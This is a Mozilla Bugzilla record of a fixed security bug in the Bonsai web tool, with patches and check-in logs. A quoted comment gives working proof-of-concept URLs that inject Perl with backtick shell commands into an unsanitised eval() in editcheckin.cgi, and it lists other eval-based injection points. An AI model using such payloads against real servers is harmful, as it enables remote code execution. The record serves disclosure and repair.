Closed Bug 163573 Opened 23 years ago Closed 23 years ago

CSS problems in bonsai

Categories

(Webtools Graveyard :: Bonsai, defect)

Product:
Webtools Graveyard
Component:
Bonsai
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: tara, Assigned: tara)

References

Details

Attachments

(2 files)

patch v1: fixes for the first four reported vulnerabilities
1.87 KB, patch
tara
: review+
Details | Diff | Splinter Review
patch v2: fixes for the next four reported vulnerabilities
3.06 KB, patch
tara
: review+
Details | Diff | Splinter Review
This patch has fixes for the first four vulnerabilities listed in the bugtraq report. The cvsblame.cgi portion of the patch may not apply (I hacked it manually with the spelling fix in the latest revision, which CVS may not like).
*** Bug 155493 has been marked as a duplicate of this bug. ***
*** Bug 155659 has been marked as a duplicate of this bug. ***
Adding comment from duped bug for centralization purposes: There seems to be a dangerous bug in bonsai which allows execution of arbitrary code on the web server with the privileges of the web server. The problems is in file editcheckin.cgi on the line: my $info = eval("\\%" . $::FORM{'id'}); I run a little modified bonsai so I am not completely sure it will work on the genuine bonsai but probably it will work. So the problem is eval executes backticks (``). The following URL: -------------------------------- http://bonsai/editcheckin.cgi?id=$a=%22a%22;$b=%60echo%20%22Content-type:%20text/html\n\ngeorgi%22%20%3E/tmp/georgi%60;print%20$b;$g=%22a%22 --------------------------------- evals the following ----------------------------- $a="a";$b=`echo "Content-type: text/html\n\ngeorgi" >/tmp/georgi`;print $b;$g="a"; ----------------------------- and creates a file /tmp/georgi The following URL: ----------------------------- http://bonsai/editcheckin.cgi?id=$a=%22a%22;$b=%60cat%20/tmp/georgi%60;print%20$b;$g=%22a%22 ------------------------------ does cat /tmp/georgi A quick grep for eval shows also the following potentially dangerous evals: addcheckin.pl:189: $info = eval("\\\%$id"); addcheckin.pl:208: if ((eval("\$$i" . "{person}") eq $name) && adminfuncs.pl:45: my $info = eval("\\\%$checkin"); cvsblame.cgi:493: l.document.write(eval("log" + revToName(rev)) + "</TD></TR></TABLE>"); doeditcheckin.cgi:44: $info = eval("\\%" . $::FORM{'id'}); dotweak.cgi:80: my $info = eval("\\%" . $i); dotweak.cgi:89: my $info = eval("\\%" . $i); editcheckin.cgi:38:my $info = eval("\\%" . $::FORM{'id'}); globals.pl:218:## correctly when eval'ed globals.pl:249: my $value = eval($name); repophook.cgi:95: $info = eval("\\\%$id"); showcheckins.cgi:64: $info = eval("\\\%$checkin"); showcheckins.cgi:81: $info = eval("\\\%$checkin"); showcheckins.cgi:108: my $aref = eval("\\\%$a"); showcheckins.cgi:109: my $bref = eval("\\\%$b"); showcheckins.cgi:130: $info = eval("\\\%$infoname"); showcheckins.cgi:209: $info = eval("\\\%$checkin"); toplevel.cgi:109: my $info = eval("\\\%$checkin");
Comment on attachment 95950 [details] [diff] [review] patch v1: fixes for the first four reported vulnerabilities tested and happy
Attachment #95950 - Flags: review+
I can't reproduce the last three reported vulnerabilities on bonsai.mozilla.org. Can anyone else?
Checked in first patch: Checking in cvslog.cgi; /cvsroot/mozilla/webtools/bonsai/cvslog.cgi,v <-- cvslog.cgi new revision: 1.18; previous revision: 1.17 done Checking in cvsblame.cgi; /cvsroot/mozilla/webtools/bonsai/cvsblame.cgi,v <-- cvsblame.cgi new revision: 1.33; previous revision: 1.32 done Checking in globals.pl; /cvsroot/mozilla/webtools/bonsai/globals.pl,v <-- globals.pl new revision: 1.16; previous revision: 1.15 done
Attachment #95985 - Flags: review+
I've tried 3 different browsers looking for georgi, and natch.
Survey says we seem to be in good shape.
um, when I said "in good shape" I meant "I'm going to close this bug now"
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Checking in cvsqueryform.cgi; /cvsroot/mozilla/webtools/bonsai/cvsqueryform.cgi,v <-- cvsqueryform.cgi new revision: 1.15; previous revision: 1.14 done Checking in showcheckins.cgi; /cvsroot/mozilla/webtools/bonsai/showcheckins.cgi,v <-- showcheckins.cgi new revision: 1.11; previous revision: 1.10 done
Product: Webtools → Webtools Graveyard
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: